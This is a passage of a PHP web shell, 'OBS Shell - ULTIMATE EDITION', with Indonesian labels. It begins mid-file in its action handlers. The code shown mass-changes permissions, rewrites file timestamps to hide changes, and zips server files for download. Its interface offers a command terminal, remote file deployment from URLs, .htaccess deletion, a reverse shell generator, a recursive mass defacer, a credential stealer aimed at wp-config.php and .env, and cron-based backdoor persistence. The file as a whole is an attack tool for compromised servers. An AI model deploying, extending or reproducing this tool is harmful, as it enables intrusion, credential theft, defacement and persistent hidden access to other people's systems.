                $messages[] = "Pilih file/dir dan isi mode chmod.";
            } else {
                $mode = octdec($modeStr);
                foreach ($fileTargets as $t) {
                    $f = $pwd . DIRECTORY_SEPARATOR . basename($t);
                    if (!file_exists($f)) {
                        $messages[] = "[FAIL] Target file tidak ada: $f";
                        continue;
                    }
                    if (!@chmod($f, $mode)) {
                        $messages[] = "[FAIL] Gagal chmod file: $f";
                    } else {
                        $messages[] = "[OK]   Berhasil chmod file: $f";
                    }
                }
                foreach ($dirTargets as $d) {
                    $dirPath = cleanPath($d);
                    if (!file_exists($dirPath)) {
                        $messages[] = "[FAIL] Target dir tidak ada: $dirPath";
                        continue;
                    }
                    if (!@chmod($dirPath, $mode)) {
                        $messages[] = "[FAIL] Gagal chmod dir: $dirPath";
                    } else {
                        $messages[] = "[OK]   Berhasil chmod dir: $dirPath";
                    }
                }
            }
        }

        if ($action === 'chmod_apply_recursive') {
            $fileTargets = $_POST['file_targets'] ?? [];
            $dirTargets = $_POST['dir_targets'] ?? [];
            $modeStr = trim($_POST['chmod_mode'] ?? '');
            if ((!$fileTargets && !$dirTargets) || $modeStr === '') {
                $messages[] = "Pilih file/dir dan isi mode chmod.";
            } else {
                $mode = octdec($modeStr);
                foreach ($fileTargets as $t) {
                    $f = $pwd . DIRECTORY_SEPARATOR . basename($t);
                    chmod_recursive($f, $mode, $messages);
                }
                foreach ($dirTargets as $d) {
                    $dirPath = cleanPath($d);
                    chmod_recursive($dirPath, $mode, $messages);
                }
            }
        }

        if ($action === 'time_apply_flat') {
            $fileTargets = $_POST['file_targets'] ?? [];
            $dirTargets = $_POST['dir_targets'] ?? [];
            $timeStr = trim($_POST['time_value'] ?? '');
            if ((!$fileTargets && !$dirTargets) || $timeStr === '') {
                $messages[] = "Pilih file/dir dan isi waktu.";
            } else {
                $ts = strtotime($timeStr);
                if ($ts === false) {
                    $messages[] = "Format waktu tidak valid.";
                } else {
                    foreach ($fileTargets as $t) {
                        $f = $pwd . DIRECTORY_SEPARATOR . basename($t);
                        if (!file_exists($f)) {
                            $messages[] = "[FAIL] Target tidak ada: $f";
                            continue;
                        }
                        if (!@touch($f, $ts)) {
                            $messages[] = "[FAIL] Gagal set waktu: $f";
                        } else {
                            clearstatcache(true, $f);
                            $messages[] = "[OK]   Berhasil set waktu: $f";
                        }
                    }
                    foreach ($dirTargets as $d) {
                        $dirPath = cleanPath($d);
                        if (!file_exists($dirPath)) {
                            $messages[] = "[FAIL] Target tidak ada: $dirPath";
                            continue;
                        }
                        if (!@touch($dirPath, $ts)) {
                            $messages[] = "[FAIL] Gagal set waktu: $dirPath";
                        } else {
                            clearstatcache(true, $dirPath);
                            $messages[] = "[OK]   Berhasil set waktu: $dirPath";
                        }
                    }
                }
            }
        }

        if ($action === 'time_apply_recursive') {
            $fileTargets = $_POST['file_targets'] ?? [];
            $dirTargets = $_POST['dir_targets'] ?? [];
            $timeStr = trim($_POST['time_value'] ?? '');
            if ((!$fileTargets && !$dirTargets) || $timeStr === '') {
                $messages[] = "Pilih file/dir dan isi waktu.";
            } else {
                $ts = strtotime($timeStr);
                if ($ts === false) {
                    $messages[] = "Format waktu tidak valid.";
                } else {
                    foreach ($fileTargets as $t) {
                        $f = $pwd . DIRECTORY_SEPARATOR . basename($t);
                        touch_recursive($f, $ts, $messages, $timeStr);
                    }
                    foreach ($dirTargets as $d) {
                        $dirPath = cleanPath($d);
                        touch_recursive($dirPath, $ts, $messages, $timeStr);
                    }
                }
            }
        }

        if ($action === 'download_selected') {
            $fileTargets = $_POST['file_targets'] ?? [];
            $dirTargets = $_POST['dir_targets'] ?? [];
            if (!$fileTargets && !$dirTargets) {
                $messages[] = "Pilih minimal satu file atau folder untuk download.";
            } else {
                $paths = [];
                foreach ($fileTargets as $f) {
                    $p = $pwd . DIRECTORY_SEPARATOR . basename($f);
                    if (file_exists($p)) $paths[] = $p;
                }
                foreach ($dirTargets as $d) {
                    $p = cleanPath($d);
                    if (is_dir($p)) $paths[] = $p;
                }
                if (!$paths) {
                    $messages[] = "Tidak ada target valid untuk di-zip.";
                } else {
                    $zipName = 'download_' . date('Ymd_His') . '.zip';
                    $zipPath = sys_get_temp_dir() . DIRECTORY_SEPARATOR . $zipName;
                    if (!zip_paths($paths, $zipPath, $messages)) {
                        $messages[] = "Gagal membuat ZIP download.";
                    } else {
                        if (send_download($zipPath, $zipName)) {
                            @unlink($zipPath);
                            exit;
                        } else {
                            $messages[] = "Gagal mengirim file download.";
                        }
                    }
                }
            }
        }
    }
}

// load isi file kalau lagi edit
$editContent = '';
if ($editFile !== '') {
    $editPath = $pwd . DIRECTORY_SEPARATOR . $editFile;
    if (is_file($editPath) && is_readable($editPath)) {
        $editContent = file_get_contents($editPath);
    } else {
        $messages[] = "[FAIL] Tidak bisa membaca file: $editPath";
        $editFile = '';
    }
}

$self = htmlspecialchars($_SERVER['PHP_SELF'], ENT_QUOTES, 'UTF-8');
$parent = dirname($pwd);
?>
<!doctype html>
<html>
<head>
<meta charset="utf-8">
<title>OBS Shell - ULTIMATE EDITION</title>
<link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link href="https://fonts.googleapis.com/css2?family=Inter:wght@400;500;600&family=JetBrains+Mono:wght@400;500&display=swap" rel="stylesheet">
<style>
 :root {
   --bg: #020617;
   --border: #1f2937;
   --accent: #38bdf8;
   --accent-soft: rgba(56,189,248,0.12);
   --accent-strong: #0ea5e9;
   --text: #e5e7eb;
   --text-soft: #9ca3af;
   --danger: #f97373;
   --success: #4ade80;
   --row-hover: rgba(55,65,81,0.7);
   --row-selected: rgba(56,189,248,0.14);
   --input-bg: #020617;
 }
 * { box-sizing:border-box; }
 body{
   margin:0;
   padding:16px;
   font-family:"Inter",system-ui,-apple-system,BlinkMacSystemFont,sans-serif;
   font-size:13px;
   background:radial-gradient(circle at top,#1f2937 0,#020617 40%,#000 100%);
   color:var(--text);
   cursor:default;
 }
 .box {
   border-radius:10px;
   border:1px solid var(--border);
   padding:10px 12px;
   margin-bottom:12px;
   background:radial-gradient(circle at top left,rgba(56,189,248,0.08),rgba(15,23,42,0.98));
   box-shadow:0 10px 30px rgba(0,0,0,0.55);
 }
 .box strong { font-size:12px; text-transform:uppercase; letter-spacing:0.08em; color:var(--text-soft); }
 input[type=text],input[type=file],textarea,select{
   font-family:inherit;font-size:13px;border-radius:6px;border:1px solid var(--border);
   background:var(--input-bg);color:var(--text);padding:6px 8px;width:100%;
 }
 textarea{
   height:320px;resize:vertical;line-height:1.4;
   font-family:"JetBrains Mono",monospace;font-size:12px;
 }
 button{
   border-radius:999px;border:1px solid rgba(148,163,184,0.5);
   background:radial-gradient(circle at 0 0,rgba(56,189,248,0.15),rgba(15,23,42,0.95));
   color:var(--text);font-size:11px;padding:4px 10px;cursor:pointer;margin:2px;
 }
 button:hover{
   border-color:var(--accent);
   background:radial-gradient(circle at 0 0,rgba(56,189,248,0.25),rgba(15,23,42,0.95));
 }
 .btn-danger{
   border-color:rgba(248,113,113,0.6);
   background:radial-gradient(circle at 0 0,rgba(248,113,113,0.15),rgba(15,23,42,0.95));
 }
 .btn-danger:hover{ border-color:var(--danger); }
 .btn-success{
   border-color:rgba(74,222,128,0.6);
   background:radial-gradient(circle at 0 0,rgba(74,222,128,0.15),rgba(15,23,42,0.95));
 }
 .btn-success:hover{ border-color:var(--success); }
 table{
   border-collapse:collapse;width:100%;font-size:12px;margin-top:4px;table-layout:fixed;
 }
 th,td{
   border:1px solid var(--border);padding:6px 8px;white-space:nowrap;overflow:hidden;text-overflow:ellipsis;
 }
 th{
   background:#020617;color:var(--text-soft);font-size:11px;text-transform:uppercase;letter-spacing:0.06em;
 }
 tbody tr{ background:linear-gradient(90deg,rgba(15,23,42,0.96),rgba(15,23,42,0.9)); }
 tbody tr:hover{ background:var(--row-hover); }
 tbody tr.selected-row{
   background:var(--row-selected);box-shadow:inset 0 0 0 1px var(--accent-soft);
 }
 .header{display:flex;align-items:center;gap:10px;margin-bottom:10px;}
 .logo{width:24px;height:24px;border-radius:8px;
       background:conic-gradient(from 90deg,#38bdf8,#0ea5e9,#22c55e,#eab308,#38bdf8);
       box-shadow:0 0 16px rgba(56,189,248,0.8);}
 .title-text{font-size:13px;letter-spacing:0.12em;text-transform:uppercase;color:var(--text-soft);}
 .term-output{
   margin-top:8px;padding:8px;border-radius:8px;border:1px solid #1f2937;
   background:#020617;font-family:"JetBrains Mono",monospace;font-size:11px;
   max-height:260px;overflow:auto;white-space:pre-wrap;
 }
 a{color:#38bdf8;text-decoration:none;}a:hover{color:#0ea5e9;}
 code{font-family:"JetBrains Mono",monospace;font-size:11px;}
 .feature-grid{display:grid;grid-template-columns:repeat(auto-fit,minmax(200px,1fr));gap:10px;}
</style>
<script>
function setPreset(url){
  const el=document.getElementById('src_url');
  if(!el)return;
  el.value=url;
}
function toggleAllCheckboxes(source){
  document.querySelectorAll('input[type="checkbox"][name="file_targets[]"], input[type="checkbox"][name="dir_targets[]"]').forEach(cb=>{
    cb.checked = source.checked;
  });
}
function toggleBox(id){
  const all=['box_new_file','box_new_folder','box_rename','box_chmod','box_time','box_url_upload','box_htaccess','box_reverse','box_deface','box_creds','box_persistence','box_findreplace'];
  all.forEach(x=>{
    const el=document.getElementById(x);
    if(!el)return;
    if(x===id){
      el.style.display=(el.style.display==='none'||el.style.display==='')?'block':'none';
    }else{
      el.style.display='none';
    }
  });
}
document.addEventListener('DOMContentLoaded',()=>{
  document.querySelectorAll('tbody tr').forEach(row=>{
    row.addEventListener('click',e=>{
      const tag=e.target.tagName.toLowerCase();
      if(tag==='button'||tag==='input'||tag==='a'||e.target.closest('button')||e.target.closest('a')) return;
      document.querySelectorAll('tbody tr.selected-row').forEach(r=>r.classList.remove('selected-row'));
      row.classList.add('selected-row');
    });
  });
});
</script>
</head>
<body>

<div class="header">
  <div class="logo"></div>
  <div class="title-text">OBS SHELL - ULTIMATE EDITION 🔥</div>
</div>

<!-- INFO SERVER -->
<div style="font-size:12px; line-height:1.4; margin-bottom:10px; padding:8px 10px; background:#020617; border-radius:6px; border:1px solid #1f2937;">
  <div><strong>Uname:</strong><br><?php echo htmlspecialchars($uname, ENT_QUOTES, 'UTF-8'); ?></div>
  <div style="margin-top:4px;"><strong>User:</strong><br>
    <?php echo htmlspecialchars($userName, ENT_QUOTES, 'UTF-8'); ?>
    [ <?php echo htmlspecialchars($groupName, ENT_QUOTES, 'UTF-8'); ?> ]
  </div>
  <div style="margin-top:4px;"><strong>PHP:</strong><br>
    <?php echo htmlspecialchars($phpVersion, ENT_QUOTES, 'UTF-8'); ?> Safe Mode: OFF
  </div>
  <div style="margin-top:4px;"><strong>ServerIP:</strong><br>
    <?php echo htmlspecialchars($serverIp, ENT_QUOTES, 'UTF-8'); ?> Your IP: <?php echo htmlspecialchars($yourIp, ENT_QUOTES, 'UTF-8'); ?>
  </div>
  <div style="margin-top:4px;"><strong>DateTime:</strong><br>
    <?php echo htmlspecialchars($dateTime, ENT_QUOTES, 'UTF-8'); ?>
  </div>
  <div style="margin-top:4px;"><strong>HDD:</strong><br>
    Total:<?php echo $diskTotalGB; ?> GB&nbsp;&nbsp;Free:<?php echo $diskFreeGB; ?> GB [<?php echo $diskFreePct; ?>%]
  </div>
  <div style="margin-top:4px;"><strong>SoftWare:</strong><br>
    <?php echo htmlspecialchars($software, ENT_QUOTES, 'UTF-8'); ?>
  </div>
  <div style="margin-top:4px;"><strong>Modules:</strong><br>
    CURL : <?php echo $curlOn; ?> | SSH2 : <?php echo $ssh2On; ?> | MySQL : <?php echo $mysqlOn; ?> | PostgreSQL : <?php echo $pgOn; ?>
  </div>
</div>

<?php if (!empty($messages)): ?>
<div class="box">
  <?php foreach ($messages as $m): ?>
    <div><?php echo htmlspecialchars($m, ENT_QUOTES, 'UTF-8'); ?></div>
  <?php endforeach; ?>
</div>
<?php endif; ?>

<!-- TERMINAL -->
<form method="post" action="<?php echo $self . '?pwd=' . urlencode($pwd); ?>">
  <div class="box">
    <strong>💻 Terminal (cd ke PWD):</strong><br><br>
    <input type="text" name="terminal_cmd" placeholder="contoh: ls -la atau whoami"><br><br>
    <button type="submit" name="action" value="terminal_exec">RUN COMMAND</button>
    <?php if ($terminalOut !== ''): ?>
      <div class="term-output">
        <?php echo htmlspecialchars($terminalOut, ENT_QUOTES, 'UTF-8'); ?>
      </div>
    <?php endif; ?>
  </div>
</form>

<!-- FORM UTAMA -->
<form method="post" enctype="multipart/form-data" action="<?php echo $self . '?pwd=' . urlencode($pwd); ?>">

  <!-- PWD dengan edit manual -->
  <div class="box">
    <strong>📁 PWD (root sekarang):</strong><br>
    <input type="text" name="manual_pwd" value="<?php echo htmlspecialchars($pwd, ENT_QUOTES, 'UTF-8'); ?>" style="width:100%; margin-bottom:8px;"><br>
    <button type="submit" name="action" value="change_pwd">Ganti PWD</button>
    <?php if ($parent !== $pwd): ?>
      <a href="<?php echo $self; ?>?pwd=<?php echo urlencode($parent); ?>" style="margin-left:10px;">[..] Naik satu level</a>
    <?php endif; ?>
  </div>

  <!-- PANEL AKSI UTAMA -->
  <div class="box">
    <strong>⚡ Aksi Massal:</strong><br><br>
    <button type="button" onclick="toggleBox('box_new_file')">📄 NEW FILE</button>
    <button type="button" onclick="toggleBox('box_new_folder')">📁 NEW FOLDER</button>
    <button type="button" onclick="toggleBox('box_rename')">✏️ RENAME</button>
    <button type="button" onclick="toggleBox('box_chmod')">🔐 CHMOD</button>
    <button type="button" onclick="toggleBox('box_time')">⏰ MODIFY WAKTU</button>
    <button type="button" onclick="toggleBox('box_url_upload')">🌐 URL / UPLOAD</button>
    <button type="button" onclick="toggleBox('box_htaccess')">🗑️ HAPUS .HTACCESS</button>
    <button type="submit" name="action" value="download_selected">📦 DOWNLOAD SELECTED (ZIP)</button>
    <button type="submit" name="action" value="delete_selected" class="btn-danger" 
            onclick="return confirm('Hapus semua file/folder yang dicentang?')">
      🗑️ DELETE SELECTED
    </button>
  </div>

  <!-- FITUR KEREN BARU -->
  <div class="box">
    <strong>🔥 FITUR EKSTRA:</strong><br><br>
    <button type="button" onclick="toggleBox('box_reverse')" class="btn-success">🎯 REVERSE SHELL</button>
    <button type="button" onclick="toggleBox('box_deface')" class="btn-success">💀 MASS DEFACER</button>
    <button type="button" onclick="toggleBox('box_creds')" class="btn-success">🔑 CREDENTIAL STEALER</button>
    <button type="button" onclick="toggleBox('box_persistence')" class="btn-success">🕷️ PERSISTENCE</button>
    <button type="button" onclick="toggleBox('box_findreplace')" class="btn-success">🔄 FIND & REPLACE</button>
  </div>

  <!-- REVERSE SHELL GENERATOR -->
  <div id="box_reverse" class="box" style="display:none;">
    <strong>🎯 Reverse Shell Generator:</strong><br><br>
    <input type="text" name="rev_ip" placeholder="Your IP: 123.45.67.89"><br><br>
    <input type="text" name="rev_port" placeholder="Port: 4444"><br><br>
    <select name="rev_type">
      <option value="bash">Bash</option>
      <option value="nc">Netcat</option>
      <option value="nc2">Netcat (mkfifo)</option>
      <option value="python">Python</option>
      <option value="php">PHP</option>
      <option value="perl">Perl</option>
    </select><br><br>
    <button type="submit" name="action" value="generate_reverse_shell">GENERATE</button>
  </div>

  <!-- MASS DEFACER -->
  <div id="box_deface" class="box" style="display:none;">
    <strong>💀 Mass Defacer (Rekursif):</strong><br><br>
    <textarea name="deface_message" placeholder="Your deface message here..." rows="5"></textarea><br><br>
    <input type="text" name="deface_extensions" value="php,html,htm" placeholder="Extensions: php,html,htm"><br><br>
    <button type="submit" name="action" value="mass_deface" class="btn-danger" onclick="return confirm('Yakin mau deface semua file?')">DEFACE!</button>
  </div>

  <!-- CREDENTIAL STEALER -->
  <div id="box_creds" class="box" style="display:none;">
    <strong>🔑 Credential Stealer (Scan config files):</strong><br><br>
    <span style="font-size:11px;color:#9ca3af;">Scan wp-config.php, .env, config.php, database.php</span><br><br>
    <button type="submit" name="action" value="steal_credentials">SCAN CREDENTIALS</button>
  </div>

  <!-- PERSISTENCE -->
  <div id="box_persistence" class="box" style="display:none;">
    <strong>🕷️ Backdoor Persistence (Cron Job):</strong><br><br>
    <input type="text" name="backdoor_path" value="<?php echo basename($_SERVER['PHP_SELF']); ?>" placeholder="Path to backdoor"><br><br>
    <button type="submit" name="action" value="install_persistence" class="btn-success" onclick="return confirm('Install cron job?')">INSTALL PERSISTENCE</button>
  </div>

  <!-- MASS FIND & REPLACE -->
  <div id="box_findreplace" class="box" style="display:none;">
    <strong>🔄 Mass Find & Replace (Rekursif):</strong><br><br>
    <input type="text" name="fr_search" placeholder="Cari teks..."><br><br>
    <input type="text" name="fr_replace" placeholder="Ganti dengan..."><br><br>
    <input type="text" name="fr_extensions" placeholder="Extensions (kosongkan untuk semua): php,txt,html"><br><br>
    <button type="submit" name="action" value="mass_find_replace">FIND & REPLACE</button>
  </div>

  <div id="box_new_file" class="box" style="display:none;">
    <strong>Create new file (ke PWD / folder dicentang):</strong><br><br>
    <input type="text" name="new_file_name" placeholder="contoh: newfile.php"><br><br>
    <textarea name="new_file_content" placeholder="// isi file baru..."></textarea><br><br>
    <button type="submit" name="action" value="create_file_flat">
      CREATE FILE (hanya PWD / folder dicentang)
    </button>
    <button type="submit" name="action" value="create_file_recursive">
      CREATE FILE RECURSIVE (folder dicentang + isi)
    </button>
  </div>

  <div id="box_new_folder" class="box" style="display:none;">
    <strong>Create new folder (ke PWD / folder dicentang):</strong><br><br>
    <input type="text" name="new_folder_name" placeholder="contoh: newfolder"><br><br>
    <button type="submit" name="action" value="create_folder_flat">
      CREATE FOLDER (hanya PWD / folder dicentang)
    </button>
    <button type="submit" name="action" value="create_folder_recursive">
      CREATE FOLDER RECURSIVE (folder dicentang + isi)
    </button>
  </div>

  <div id="box_rename" class="box" style="display:none;">
    <strong>Rename file (pakai kolom RENAME di tabel):</strong><br><br>
    <span style="font-size:11px;color:#9ca3af;">
      Centang file, ubah nama di kolom RENAME, lalu klik tombol di bawah.
    </span><br><br>
    <button type="submit" name="action" value="rename_save_mass">
      SAVE RENAME (file yang dicentang)
    </button>
  </div>

  <div id="box_chmod" class="box" style="display:none;">
    <strong>CHMOD (file + dir):</strong><br>
    <input type="text" name="chmod_mode" placeholder="misal: 0777 atau 0644"><br><br>
    <button type="submit" name="action" value="chmod_apply_flat">
      APPLY CHMOD (hanya yang dicentang)
    </button>
    <button type="submit" name="action" value="chmod_apply_recursive">
      APPLY CHMOD RECURSIVE (yang dicentang + isi)
    </button>
  </div>

  <div id="box_time" class="box" style="display:none;">
    <strong>Modify waktu (mtime):</strong><br>
    <input type="text" name="time_value" placeholder="YYYY-MM-DD HH:MM:SS"><br><br>
    <button type="submit" name="action" value="time_apply_flat">
      APPLY WAKTU (hanya yang dicentang)
    </button>
    <button type="submit" name="action" value="time_apply_recursive">
      APPLY WAKTU RECURSIVE (yang dicentang + isi)
    </button>
  </div>

  <div id="box_htaccess" class="box" style="display:none;">
    <strong>Hapus .htaccess:</strong><br><br>
    <select name="htaccess_mode" style="padding:6px 8px; border-radius:6px; background:#020617; color:#e5e7eb; border:1px solid #1f2937;">
      <option value="current">Hanya di direktori saat ini</option>
      <option value="recursive">Rekursif (semua subdirektori)</option>
    </select><br><br>
    <button type="submit" name="action" value="delete_htaccess" class="btn-danger" 
            onclick="return confirm('Yakin hapus semua file .htaccess?')">
      HAPUS .HTACCESS
    </button>
  </div>

  <div id="box_url_upload" class="box" style="display:none;">
    <strong>Preset / URL / Upload (PWD / folder dicentang):</strong><br><br>
    <?php foreach ($presets as $key => $url): ?>
      <button type="button" onclick="setPreset('<?php echo htmlspecialchars($url, ENT_QUOTES, 'UTF-8'); ?>')">
        Preset <?php echo htmlspecialchars($key, ENT_QUOTES, 'UTF-8'); ?>
      </button>
    <?php endforeach; ?><br><br>
    <input type="text" id="src_url" name="src_url" placeholder="https://example.com/file.php"><br><br>
    <input type="text" name="target_name_url" placeholder="nama file tujuan, misal: file.php"><br><br>
    <button type="submit" name="action" value="deploy_url">SAVE DARI URL (PWD / dir dicentang)</button>
    <hr style="border:0;border-top:1px solid #1f2937;margin:10px 0;">
    <input type="file" name="src_file"><br><br>
    <input type="text" name="target_name_upload" placeholder="nama file tujuan upload, misal: upload.php"><br><br>
    <button type="submit" name="action" value="deploy_upload">UPLOAD FILE (PWD / dir dicentang)</button>
  </div>

  <!-- TABEL ISI PWD -->
  <div class="box">
    <strong>📂 Isi PWD (folder + file):</strong><br><br>
    <?php
      $items = @scandir($pwd);
      if ($items === false) {
          echo '<em>Tidak bisa membaca direktori.</em>';
      } else {
          echo '<table>';
          echo '<thead><tr>
                  <th><input type="checkbox" onclick="toggleAllCheckboxes(this)"></th>
                  <th>TIPE</th>
                  <th>NAMA FILE / DIR</th>
                  <th>EDIT</th>
                  <th>RENAME (isi nama baru)</th>
                  <th>DELETE / RENAME DIR</th>
                  <th>PERM</th>
                  <th>MTIME</th>
                </tr></thead><tbody>';
          foreach ($items as $it) {
              if ($it === '.' || $it === '..') continue;
              $full = $pwd . DIRECTORY_SEPARATOR . $it;
              $safe = htmlspecialchars($it, ENT_QUOTES, 'UTF-8');
              $perm = substr(sprintf('%o', @fileperms($full)), -4);
              $mtime = @filemtime($full);
              $mtimeStr = $mtime ? date('Y-m-d H:i:s', $mtime) : '-';

              if (is_dir($full)) {
                  $link = $self . '?pwd=' . urlencode($full);
                  $fullEsc = htmlspecialchars($full, ENT_QUOTES, 'UTF-8');
                  echo '<tr class="folder-row">';
                  echo '<td><input type="checkbox" name="dir_targets[]" value="'.$fullEsc.'"></td>';
                  echo '<td>DIR</td>';
                  echo '<td><a href="'.$link.'">'.$safe.'/</a></td>';
                  echo '<td></a></td>';
                  echo '<td><input type="text" name="rename_dir_val['.$safe.']" value="'.$safe.'"></td>';
                  echo '<td>
                          <button type="submit" class="btn-danger"
                                  name="action"
                                  value="delete_dir_one:'.$fullEsc.'"
                                  onclick="return confirm(\'Hapus folder '.$safe.' beserta isinya?\')">
                            DELETE
                          </button>
                          <button type="submit"
                                  name="action"
                                  value="rename_dir_one:'.$fullEsc.'"
                                  onclick="var inp=this.closest(\'tr\').querySelector(\'input[name=&quot;rename_dir_val['.$safe.']&quot;]\'); this.value = \'rename_dir_one:'.$fullEsc.'|\' + (inp?inp.value:\'\');">
                            RENAME
                          </button>
                         </a></td>';
                  echo '<td>'.htmlspecialchars($perm, ENT_QUOTES, 'UTF-8').'</a></td>';
                  echo '<td>'.$mtimeStr.'</a></td>';
                  echo '</tr>';
              } else {
                  $editLink = $self . '?pwd=' . urlencode($pwd) . '&edit=' . urlencode($it);
                  echo '<tr>';
                  echo '<td><input type="checkbox" class="file-check" name="file_targets[]" value="'.$safe.'"></td>';
                  echo '<td>FILE</td>';
                  echo '<td>'.$safe.'</a></td>';
                  echo '<td><a href="'.$editLink.'">EDIT</a></td>';
                  echo '<td><input type="text" name="rename_val['.$safe.']" value="'.$safe.'"></td>';
                  echo '<td>
                          <button type="submit" class="btn-danger"
                                  name="action"
                                  value="delete_one:'.$safe.'"
                                  onclick="return confirm(\'Hapus '.$safe.'?\')">
                            DELETE
                          </button>
                         </a></td>';
                  echo '<td>'.htmlspecialchars($perm, ENT_QUOTES, 'UTF-8').'</a></td>';
                  echo '<td>'.$mtimeStr.'</a></td>';
                  echo '</tr>';
              }
          }
          echo '</tbody>';
      }
    ?>
  </div>

</form>

<?php if ($editFile !== ''): ?>
<form method="post" action="<?php echo $self . '?pwd=' . urlencode($pwd); ?>">
  <div class="box">
    <strong>✏️ Edit file:</strong><br><br>
    <input type="text" name="edit_file" value="<?php echo htmlspecialchars($editFile, ENT_QUOTES, 'UTF-8'); ?>" readonly><br><br>
    <textarea name="file_content"><?php echo htmlspecialchars($editContent, ENT_QUOTES, 'UTF-8'); ?></textarea><br><br>
    <button type="submit" name="action" value="edit_save">SAVE FILE</button>
  </div>
</form>
<?php endif; ?>

</body>
</html>
